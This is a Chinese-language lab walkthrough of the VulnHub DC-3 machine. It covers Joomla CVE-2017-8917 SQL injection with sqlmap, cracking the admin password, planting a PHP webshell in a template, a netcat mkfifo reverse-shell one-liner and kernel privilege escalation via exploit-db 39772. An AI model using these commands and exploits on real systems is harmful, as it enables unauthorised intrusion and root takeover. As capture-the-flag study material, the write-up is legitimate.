Vulnhnb刷题-DC-3

打开后

image-20230604181720778

信息收集

image-20230604182231226

image-20230604182304959image-20230604183123417

image-20230604182406363

通过goby查到后台框架有一个漏洞,那就直接利用进入后台

利用过程

vulhub/joomla/CVE-2017-8917 at master · vulhub/vulhub · GitHub

或者使用kali自带的搜索相关exp

image-20230604184106980

image-20230604184048510

直接给出sqlmap的利用的命令,复制干就完了(记得改目标IP地址)

image-20230604184602570

image-20230604184731220

sqlmap 查库 把管理员用户名密码拿出来

image-20230604184854109

看到user表,看看有什么东西

image-20230604185057062

直接复制密码去使用kali带的解密工具爆破看看

image-20230604185157424

管理地址:http://192.168.119.150/administrator

管理员用户名:admin

管理员密码:snoopy

传马

登录后台后在【Extensions】->【Templates】中任意模板中发现可以编辑和新建文件,那就直接新建一个一句话木马

image-20230604185845645

但是还得了解一下 joomla的目录结构要不然访问不了木马

image-20230604190010479

后面应该就是接模板名称

最后得到木马地址:http://192.168.119.150/templates/beez3/ma.php

直接上蚁剑连上

image-20230604190104325

反弹一个shell给kali好操作(也可以不用)

kali监听8888端口

image-20230604190649167

在蚁剑执行

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.119.150 8888 >/tmp/f

image-20230604190806888

修改交互

python3 -c 'import pty;pty.spawn("/bin/bash")'

image-20230604190900303

即可反弹shell到kali

提权

尝试内核提权

image-20230604191731639

查询到系统为Ubuntu 16.4的版本 内核为Linux 4.4.0

image-20230604192100485

查询可用的提权漏洞

image-20230604192257690

经过尝试39772的这个可用,利用过程 导出查看exp

image-20230604192811752

exp下载 https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/39772.zip

把它复制到靶机上 直接使用python3的http.server服务,靶机使用wget即可

image-20230604193026720

image-20230604193143898

//解压文件夹
unzip 39772.zip
cd 39772
tar -xvf exploit.tar
cd ebpf_mapfd_doubleput_exploit
//依次执行
./compile.sh
./doubleput

等待一会即可提权成功

image-20230604193546769

image-20230604193619397

拿下!